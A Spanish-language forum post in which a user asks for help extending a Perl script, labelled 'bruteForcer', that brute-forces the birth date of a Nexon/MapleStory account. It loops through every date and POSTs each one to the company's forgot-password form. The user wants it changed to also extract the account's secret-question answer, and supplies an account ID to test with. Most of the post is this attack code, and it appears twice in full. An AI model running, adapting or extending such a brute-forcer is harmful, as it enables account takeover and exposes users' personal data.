Ayuda es para un juego
Publicado por Joel (1 intervención) el 27/02/2008 21:21:53
Hola buenas tardes, disculpen si esto no tiene nada q ver con algo mas creativo pero = si alguien puede ayudarme se lo agradezco. Resulta que en un juego online q se llama maplestory, quize cambiar mi password de mi cuenta y me recetearon el password, pero no me enviaron un link donde pueda yo recuperar, y buscando entre foros de hacking pero hacia el juego de maplestory, encontre un codigo donde con solo poner el id de la cuenta te da la fecha de nacimento con la cual fue registrado.y ps la verd yo no c nada de este lenguje, pero me puse a leerlo y quizas alguien de uds que tenga tiempo y pueda ayudarme, pueda agregar algunas instrucciones y a lo mejor se pueda extraer el password o algo asi, como seguridad piden la respuesta secreta de una pregunta, en mi caso seria SQ2 = Where were you born? entoncs, no c , algun codigo q extraiga la respuesta secreta, asi como extrae la fecha de nacimiento, pienso que si se podra extraer la respuesta secreta. el codigo es el siguiente: aqui les dejo el link de la pagina donde lo saque y el modo de uso, y pueden probar con este ID lisse13 esta cuenta la registre con la fecha de nacimiento 31 de mayo 1986, y si la prueban con el programa tal cual esta el resultado es esa fecha, entoncs viendo eso quisiera saber si se puede poner una instruccion extra que extraiga la respuesta secreta, de la SQ2 (Secret Question 2)
el programa a instalar se descarga de esta pagina :
http://www.activestate.com/store/download_file.aspx?binGUID=0e991cbb-7482-4900-88b0-4218add83d01.
y este es el codigo para descargar ya mencionado abajo : http://www.activestate.com/store/download_file.aspx?binGUID=0e991cbb-7482-4900-88b0-4218add83d01
y este link es donde dice como usarlo : http://www.comunidadgamerz.com/foro/showthread.php?t=10842
porfavor si alguien puede se los agradezco, sino = garcias x su atencion. q tengan buen dia
#!/usr/bin/perl
#
# (C)2007 spurified
#
# Usage:
# bruteForcer [UserID] [YearToStartAt]
#
########################################
$|=1;
use strict;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
use Switch;
## vardecs
##
my $method = "POST";
my $url = "http://passport.nexon.net/WZ.ASPX?PART=/Accounts/ForgotPassword";
my $uid = $ARGV[0];
my $NXIDvar = "/User/PasswordFindForm$txtNXID";
my $monthvar = "/User/PasswordFindForm$ddlBirthMonth";
my $dayvar = "/User/PasswordFindForm$ddlBirthDay";
my $yearvar = "/User/PasswordFindForm$ddlBirthYear";
my $clickxvar = "/User/PasswordFindForm$FindPW_Pre.x";
my $clickyvar = "/User/PasswordFindForm$FindPW_Pre.y";
my $viewstatvar = "__VIEWSTATE";
my $proxy = "";
my $header = "";
## hash for postreqs and headerinfos
##
my %PARAMS;
my %HEADERS;
## input validation
##
if ($url !~ /http:///i && $url !~ /https:///i)
{
$url = "http://".$url;
}
$url =~ s/[ ]//g;
## create user-agent
##
my $response;
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1, SV1)");
$ua->proxy('http', $proxy) if($proxy ne '');
my $currMonth;
my $icurrMonth;
my $currDay;
my $currYear;
my $si;
my $k;
my $v;
for ($currYear = $ARGV[1]; $currYear < 2009; $currYear++)
{
for ($icurrMonth = 1; $icurrMonth < 13; $icurrMonth++)
{
switch ($icurrMonth) {
case 1 { $currMonth = "January"; }
case 2 { $currMonth = "February"; }
case 3 { $currMonth = "March"; }
case 4 { $currMonth = "April"; }
case 5 { $currMonth = "May"; }
case 6 { $currMonth = "June"; }
case 7 { $currMonth = "July"; }
case 8 { $currMonth = "August"; }
case 9 { $currMonth = "September"; }
case 10 { $currMonth = "October"; }
case 11 { $currMonth = "November"; }
case 12 { $currMonth = "December"; }
}
for ($currDay = 1; $currDay < 32; $currDay++)
{
## fill hash with
## parameters
##
$PARAMS{$NXIDvar} = $uid;
$PARAMS{$monthvar} = $currMonth;
$PARAMS{$dayvar} = $currDay;
$PARAMS{$yearvar} = $currYear;
$PARAMS{$clickxvar} = "50";
$PARAMS{$clickyvar} = "17";
$PARAMS{$viewstatvar} =
"/wEPDwUKLTkyNDk3MTM1Mw9kFgICAg9kFgQCAQ9kFgJmD2QWAgIDDw8WAh4HVmlzaWJsZWhkZAIRD2QWAmYPZBYKZg8PZBYCHglvbktleWRvd24FJHJldHVybiBmcm1Db21tbmV0S2V5RG93bkV2ZW50KGV2ZW50KWQCAQ8QZBAVDQVNb250aAdKYW51YXJ5CEZlYnJ1YXJ5BU1hcmNoBUFwcmlsA01heQRKdW5lBEp
1bHkGQXVndXN0CVNlcHRlbWJlcgdPY3RvYmVyCE5vdmVtYmVyCERlY2VtYmVyFQ0FTW9udGgHSmFudWFyeQhGZWJydWFyeQVNYXJjaAVBcHJpbANNYXkESnVuZQRKdWx5BkF1Z3VzdAlTZXB0ZW1iZXIHT2N0b2JlcghOb3ZlbWJlcghEZWNlbWJlchQrAw1nZ2dnZ2dnZ2dnZ2dnZGQCAg8QZBAVIANEYXkBMQEyATM
BNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzEVIANEYXkBMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzEUKwMgZ2dnZ2d
nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIDDxBkEBVWBFllYXIEMjAwOAQyMDA3BDIwMDYEMjAwNQQyMDA0BDIwMDMEMjAwMgQyMDAxBDIwMDAEMTk5OQQxOTk4BDE5OTcEMTk5NgQxOTk1BDE5OTQEMTk5MwQxOTkyBDE5OTEEMTk5MAQxOTg5BDE5ODgEMTk4NwQxOTg2BDE5ODUEMTk4NAQxOTgzBDE5ODI
EMTk4MQQxOTgwBDE5NzkEMTk3OAQxOTc3BDE5NzYEMTk3NQQxOTc0BDE5NzMEMTk3MgQxOTcxBDE5NzAEMTk2OQQxOTY4BDE5NjcEMTk2NgQxOTY1BDE5NjQEMTk2MwQxOTYyBDE5NjEEMTk2MAQxOTU5BDE5NTgEMTk1NwQxOTU2BDE5NTUEMTk1NAQxOTUzBDE5NTIEMTk1MQQxOTUwBDE5NDkEMTk0OAQxOTQ3BDE
5NDYEMTk0NQQxOTQ0BDE5NDMEMTk0MgQxOTQxBDE5NDAEMTkzOQQxOTM4BDE5MzcEMTkzNgQxOTM1BDE5MzQEMTkzMwQxOTMyBDE5MzEEMTkzMAQxOTI5BDE5MjgEMTkyNwQxOTI2BDE5MjUEMTkyNBVWBFllYXIEMjAwOAQyMDA3BDIwMDYEMjAwNQQyMDA0BDIwMDMEMjAwMgQyMDAxBDIwMDAEMTk5OQQxOTk4BDE
5OTcEMTk5NgQxOTk1BDE5OTQEMTk5MwQxOTkyBDE5OTEEMTk5MAQxOTg5BDE5ODgEMTk4NwQxOTg2BDE5ODUEMTk4NAQxOTgzBDE5ODIEMTk4MQQxOTgwBDE5NzkEMTk3OAQxOTc3BDE5NzYEMTk3NQQxOTc0BDE5NzMEMTk3MgQxOTcxBDE5NzAEMTk2OQQxOTY4BDE5NjcEMTk2NgQxOTY1BDE5NjQEMTk2MwQxOTY
yBDE5NjEEMTk2MAQxOTU5BDE5NTgEMTk1NwQxOTU2BDE5NTUEMTk1NAQxOTUzBDE5NTIEMTk1MQQxOTUwBDE5NDkEMTk0OAQxOTQ3BDE5NDYEMTk0NQQxOTQ0BDE5NDMEMTk0MgQxOTQxBDE5NDAEMTkzOQQxOTM4BDE5MzcEMTkzNgQxOTM1BDE5MzQEMTkzMwQxOTMyBDE5MzEEMTkzMAQxOTI5BDE5MjgEMTkyNwQ
xOTI2BDE5MjUEMTkyNBQrA1ZnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgQPD2QWAh4Hb25DbGljawWHAWphdmFzY3JpcHQ6aWYoIGRvY3VtZW50LmFsbCgnL1VzZXIvUGFzc3dvcmRGaW5kRm9ybV9
0eHROWElEJykudmFsdWUgPT0gJycgKSB7IGFsZXJ0KCdQbGVhc2UgZW50ZXIgTmV4b24gUGFzc3BvcnQgSUQuJyk7IHJldHVybiBmYWxzZTsgfWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFIS9Vc2VyL1Bhc3N3b3JkRmluZEZvcm0kRmluZFBXX1ByZQ==";
## check out all the headers
## and fill the HEADERS-hash
##
my @hpairs;
$si = $k = $v = "";
@hpairs = split(/&/,$header);
foreach $si (@hpairs)
{
($k,$v) = split(/:/,$si);
$HEADERS{"$k"} = $v;
}
## the request itself
$response = $ua->request(POST "$url", \%PARAMS, %HEADERS);
## check the response and
##
##my $page = $response->content();
my $code = $response->code();
if ($code eq "302")
{
print "$uid:$currYear:$currMonth:$currDay ***WORKED*** ";
exit;
}
else
{
print "$uid:$currYear:$currMonth:$currDay ";
}
} # endpassloop
}
}
el programa a instalar se descarga de esta pagina :
http://www.activestate.com/store/download_file.aspx?binGUID=0e991cbb-7482-4900-88b0-4218add83d01.
y este es el codigo para descargar ya mencionado abajo : http://www.activestate.com/store/download_file.aspx?binGUID=0e991cbb-7482-4900-88b0-4218add83d01
y este link es donde dice como usarlo : http://www.comunidadgamerz.com/foro/showthread.php?t=10842
porfavor si alguien puede se los agradezco, sino = garcias x su atencion. q tengan buen dia
#!/usr/bin/perl
#
# (C)2007 spurified
#
# Usage:
# bruteForcer [UserID] [YearToStartAt]
#
########################################
$|=1;
use strict;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
use Switch;
## vardecs
##
my $method = "POST";
my $url = "http://passport.nexon.net/WZ.ASPX?PART=/Accounts/ForgotPassword";
my $uid = $ARGV[0];
my $NXIDvar = "/User/PasswordFindForm$txtNXID";
my $monthvar = "/User/PasswordFindForm$ddlBirthMonth";
my $dayvar = "/User/PasswordFindForm$ddlBirthDay";
my $yearvar = "/User/PasswordFindForm$ddlBirthYear";
my $clickxvar = "/User/PasswordFindForm$FindPW_Pre.x";
my $clickyvar = "/User/PasswordFindForm$FindPW_Pre.y";
my $viewstatvar = "__VIEWSTATE";
my $proxy = "";
my $header = "";
## hash for postreqs and headerinfos
##
my %PARAMS;
my %HEADERS;
## input validation
##
if ($url !~ /http:///i && $url !~ /https:///i)
{
$url = "http://".$url;
}
$url =~ s/[ ]//g;
## create user-agent
##
my $response;
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1, SV1)");
$ua->proxy('http', $proxy) if($proxy ne '');
my $currMonth;
my $icurrMonth;
my $currDay;
my $currYear;
my $si;
my $k;
my $v;
for ($currYear = $ARGV[1]; $currYear < 2009; $currYear++)
{
for ($icurrMonth = 1; $icurrMonth < 13; $icurrMonth++)
{
switch ($icurrMonth) {
case 1 { $currMonth = "January"; }
case 2 { $currMonth = "February"; }
case 3 { $currMonth = "March"; }
case 4 { $currMonth = "April"; }
case 5 { $currMonth = "May"; }
case 6 { $currMonth = "June"; }
case 7 { $currMonth = "July"; }
case 8 { $currMonth = "August"; }
case 9 { $currMonth = "September"; }
case 10 { $currMonth = "October"; }
case 11 { $currMonth = "November"; }
case 12 { $currMonth = "December"; }
}
for ($currDay = 1; $currDay < 32; $currDay++)
{
## fill hash with
## parameters
##
$PARAMS{$NXIDvar} = $uid;
$PARAMS{$monthvar} = $currMonth;
$PARAMS{$dayvar} = $currDay;
$PARAMS{$yearvar} = $currYear;
$PARAMS{$clickxvar} = "50";
$PARAMS{$clickyvar} = "17";
$PARAMS{$viewstatvar} =
"/wEPDwUKLTkyNDk3MTM1Mw9kFgICAg9kFgQCAQ9kFgJmD2QWAgIDDw8WAh4HVmlzaWJsZWhkZAIRD2QWAmYPZBYKZg8PZBYCHglvbktleWRvd24FJHJldHVybiBmcm1Db21tbmV0S2V5RG93bkV2ZW50KGV2ZW50KWQCAQ8QZBAVDQVNb250aAdKYW51YXJ5CEZlYnJ1YXJ5BU1hcmNoBUFwcmlsA01heQRKdW5lBEp
1bHkGQXVndXN0CVNlcHRlbWJlcgdPY3RvYmVyCE5vdmVtYmVyCERlY2VtYmVyFQ0FTW9udGgHSmFudWFyeQhGZWJydWFyeQVNYXJjaAVBcHJpbANNYXkESnVuZQRKdWx5BkF1Z3VzdAlTZXB0ZW1iZXIHT2N0b2JlcghOb3ZlbWJlcghEZWNlbWJlchQrAw1nZ2dnZ2dnZ2dnZ2dnZGQCAg8QZBAVIANEYXkBMQEyATM
BNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzEVIANEYXkBMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzEUKwMgZ2dnZ2d
nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIDDxBkEBVWBFllYXIEMjAwOAQyMDA3BDIwMDYEMjAwNQQyMDA0BDIwMDMEMjAwMgQyMDAxBDIwMDAEMTk5OQQxOTk4BDE5OTcEMTk5NgQxOTk1BDE5OTQEMTk5MwQxOTkyBDE5OTEEMTk5MAQxOTg5BDE5ODgEMTk4NwQxOTg2BDE5ODUEMTk4NAQxOTgzBDE5ODI
EMTk4MQQxOTgwBDE5NzkEMTk3OAQxOTc3BDE5NzYEMTk3NQQxOTc0BDE5NzMEMTk3MgQxOTcxBDE5NzAEMTk2OQQxOTY4BDE5NjcEMTk2NgQxOTY1BDE5NjQEMTk2MwQxOTYyBDE5NjEEMTk2MAQxOTU5BDE5NTgEMTk1NwQxOTU2BDE5NTUEMTk1NAQxOTUzBDE5NTIEMTk1MQQxOTUwBDE5NDkEMTk0OAQxOTQ3BDE
5NDYEMTk0NQQxOTQ0BDE5NDMEMTk0MgQxOTQxBDE5NDAEMTkzOQQxOTM4BDE5MzcEMTkzNgQxOTM1BDE5MzQEMTkzMwQxOTMyBDE5MzEEMTkzMAQxOTI5BDE5MjgEMTkyNwQxOTI2BDE5MjUEMTkyNBVWBFllYXIEMjAwOAQyMDA3BDIwMDYEMjAwNQQyMDA0BDIwMDMEMjAwMgQyMDAxBDIwMDAEMTk5OQQxOTk4BDE
5OTcEMTk5NgQxOTk1BDE5OTQEMTk5MwQxOTkyBDE5OTEEMTk5MAQxOTg5BDE5ODgEMTk4NwQxOTg2BDE5ODUEMTk4NAQxOTgzBDE5ODIEMTk4MQQxOTgwBDE5NzkEMTk3OAQxOTc3BDE5NzYEMTk3NQQxOTc0BDE5NzMEMTk3MgQxOTcxBDE5NzAEMTk2OQQxOTY4BDE5NjcEMTk2NgQxOTY1BDE5NjQEMTk2MwQxOTY
yBDE5NjEEMTk2MAQxOTU5BDE5NTgEMTk1NwQxOTU2BDE5NTUEMTk1NAQxOTUzBDE5NTIEMTk1MQQxOTUwBDE5NDkEMTk0OAQxOTQ3BDE5NDYEMTk0NQQxOTQ0BDE5NDMEMTk0MgQxOTQxBDE5NDAEMTkzOQQxOTM4BDE5MzcEMTkzNgQxOTM1BDE5MzQEMTkzMwQxOTMyBDE5MzEEMTkzMAQxOTI5BDE5MjgEMTkyNwQ
xOTI2BDE5MjUEMTkyNBQrA1ZnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgQPD2QWAh4Hb25DbGljawWHAWphdmFzY3JpcHQ6aWYoIGRvY3VtZW50LmFsbCgnL1VzZXIvUGFzc3dvcmRGaW5kRm9ybV9
0eHROWElEJykudmFsdWUgPT0gJycgKSB7IGFsZXJ0KCdQbGVhc2UgZW50ZXIgTmV4b24gUGFzc3BvcnQgSUQuJyk7IHJldHVybiBmYWxzZTsgfWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFIS9Vc2VyL1Bhc3N3b3JkRmluZEZvcm0kRmluZFBXX1ByZQ==";
## check out all the headers
## and fill the HEADERS-hash
##
my @hpairs;
$si = $k = $v = "";
@hpairs = split(/&/,$header);
foreach $si (@hpairs)
{
($k,$v) = split(/:/,$si);
$HEADERS{"$k"} = $v;
}
## the request itself
$response = $ua->request(POST "$url", \%PARAMS, %HEADERS);
## check the response and
##
##my $page = $response->content();
my $code = $response->code();
if ($code eq "302")
{
print "$uid:$currYear:$currMonth:$currDay ***WORKED*** ";
exit;
}
else
{
print "$uid:$currYear:$currMonth:$currDay ";
}
} # endpassloop
}
}
Valora esta pregunta
0